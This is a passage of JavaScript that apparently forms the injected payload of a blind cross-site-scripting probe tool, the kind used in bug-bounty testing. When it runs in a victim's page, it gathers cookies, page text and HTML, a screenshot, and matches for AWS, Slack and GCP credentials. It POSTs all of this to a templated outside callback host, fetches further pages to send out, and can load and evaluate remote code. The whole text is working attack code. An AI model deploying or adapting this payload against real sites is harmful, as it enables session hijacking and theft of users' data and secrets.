	var payload_keys = Object.keys(probe_return_data);
    if (pgp_key){
        if("screenshot" in probe_return_data){
            const encrypted_screenshot = await pgp_encrypt(pgp_key, probe_return_data['screenshot']);
            var encryptedBlob = new Blob([encrypted_screenshot], {
                type: 'text/plain'
            });
            form_data.append("screenshot", encryptedBlob, "screenshot.enc")
            delete probe_return_data.screenshot;
        }
        const probe_data = await pgp_encrypt(pgp_key, JSON.stringify(probe_return_data));
        form_data.append("encrypted_data", probe_data);
        form_data.append("injection_key", probe_return_data['injection_key']);
        form_data.append("pgp_key", pgp_key);
    }else{
        payload_keys.map(function(payload_key) {
            if(payload_key === 'screenshot') {
                var base64_data = probe_return_data[payload_key].replace(
                    'data:image/png;base64,',
                    ''
                );
                var screenshot_blob = base64_to_blob(
                    base64_data,
                    'image/png'
                );
                form_data.append(
                    payload_key,
                    screenshot_blob,
                    "screenshot.png"
                )
                return
            }
            form_data.append(payload_key, probe_return_data[payload_key]);
        })
    }

    var http = new XMLHttpRequest();
    var url = "[HOST_URL]/js_callback";
    http.open("POST", url, true);
    http.onreadystatechange = function() {
        if(http.readyState == 4 && http.status == 200) {

        }
    }
    form_data.append("path", "[USER_PATH]");
    http.send(form_data);
}

function send_collected_page( page_data ) {
	var form_data = new FormData();
	var payload_keys = Object.keys(page_data);
	payload_keys.map(function(payload_key) {
		form_data.append(payload_key, page_data[payload_key]);
	});

    var http = new XMLHttpRequest();
    var url = "[HOST_URL]/page_callback";
    http.open("POST", url, true);
    http.onreadystatechange = function() {
        if(http.readyState == 4 && http.status == 200) {

        }
    }
    form_data.append("path", "[USER_PATH]");
    http.send(form_data);
}

function look_for_secrets( data ) {
    var findings = [];
    let secret_regexes = {
        "aws": "((?:AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16})",
        "slack": "(https://hooks\.slack\.com/services/[A-Za-z0-9+/]{44,46})",
        "GCP": "\{[^{]+auth_provider_x509_cert_url[^}]+\}"
    }
    for (let secret_type in secret_regexes){
        let re = new RegExp(secret_regexes[secret_type])
        let match = re.exec(data);
        if (Array.isArray(match)){
            match = match.toString()
            let finding = {};
            finding = {"secret_type": secret_type, "secret_value": match};
            findings.push(finding);
        }
    }
    return findings
}

function collect_page_data( path, pgp_key ) {
    try {
        var full_url = location.protocol + "//" + document.domain + path
        var xhr = new XMLHttpRequest();
        xhr.onreadystatechange = function() {
            if (xhr.readyState == XMLHttpRequest.DONE) {
                page_data = {
                    "html": xhr.responseText,
                    "uri": full_url
                }
                send_collected_page( page_data );
            }
        }
        xhr.open('GET', full_url, true);
        xhr.send(null);
    } catch ( e ) {
    }
}

probe_return_data = {};

// Prevent failure incase the browser refuses to give us any of the probe data.
try {
    probe_return_data['uri'] = never_null( location.toString() );
} catch ( e ) {
    probe_return_data['uri'] = '';
}
try {
    probe_return_data['cookies'] = never_null( document.cookie );
} catch ( e ) {
    probe_return_data['cookies'] = '';
}
try {
    probe_return_data['referrer'] = never_null( document.referrer );
} catch ( e ) {
    probe_return_data['referrer'] = '';
}
try {
    probe_return_data['user-agent'] = never_null( navigator.userAgent );
} catch ( e ) {
    probe_return_data['user-agent'] = '';
}
try {
    probe_return_data['browser-time'] = never_null( ( new Date().getTime() ) );
} catch ( e ) {
    probe_return_data['browser-time'] = '';
}
try {
    probe_return_data['probe-uid'] = never_null( get_guid() );
} catch ( e ) {
    probe_return_data['probe-uid'] = '';
}
try {
    probe_return_data['origin'] = never_null( location.origin );
} catch ( e ) {
    probe_return_data['origin'] = '';
}
try {
    probe_return_data['injection_key'] = [PROBE_ID];
} catch ( e ) {
    probe_return_data['injection_key'] = '';
}

try{
    probe_return_data['title'] = document.title;
} catch( e ){
    probe_return_data['title'] = '';
}

try{
    probe_return_data['text'] = get_dom_text();
} catch( e ){
    probe_return_data['text'] = '';
}

try{
    probe_return_data['was_iframe'] = !(window.top === window)
} catch( e ){
    probe_return_data['was_iframe'] = '';

}


async function hook_load_if_not_ready() {
    try {
        try {
            probe_return_data['secrets'] = look_for_secrets(never_null( document.documentElement.outerHTML ));
        } catch ( e ) {
            probe_return_data['secrets'] = [];
        }
        try{
            const corsResults = await check_cors();
            probe_return_data['CORS'] = corsResults;
        } catch (e) {
            probe_return_data['CORS'] = "false";
        }
        try{
            const gitResults = await check_git();
            probe_return_data['gitExposed'] = gitResults;
        } catch (e) {
            probe_return_data['gitExposed'] = "false";
        }
        probe_return_data['secrets'] = JSON.stringify(probe_return_data['secrets']);
        html2canvas(document.body).then(function(canvas) {
            StackBlur.canvasRGB(
                canvas, 0, 0, canvas.width, canvas.height, 20
            );
            var tempCanvas = document.createElement("canvas"),
            tCtx = tempCanvas.getContext("2d");
            tempCanvas.width = 2560;
            tempCanvas.height = 1440;
            tCtx.drawImage(canvas,0,0);
            probe_return_data['screenshot'] = tempCanvas.toDataURL();
            finishing_moves();
        });
    } catch( e ) {
        probe_return_data['screenshot'] = '';
        await finishing_moves();
    }
}

const pgp_key = `[pgp_key]`;

let finishing_moves = async function() {
    await contact_mothership( probe_return_data, pgp_key );
    collect_pages();
    if( chainload_uri != "" && chainload_uri != null ) {
        eval_remote_source( chainload_uri );
    }
}

if( document.readyState == "complete" ) {
    hook_load_if_not_ready();
} else {
    addEvent( window, "load", function(){
        hook_load_if_not_ready();
    });
}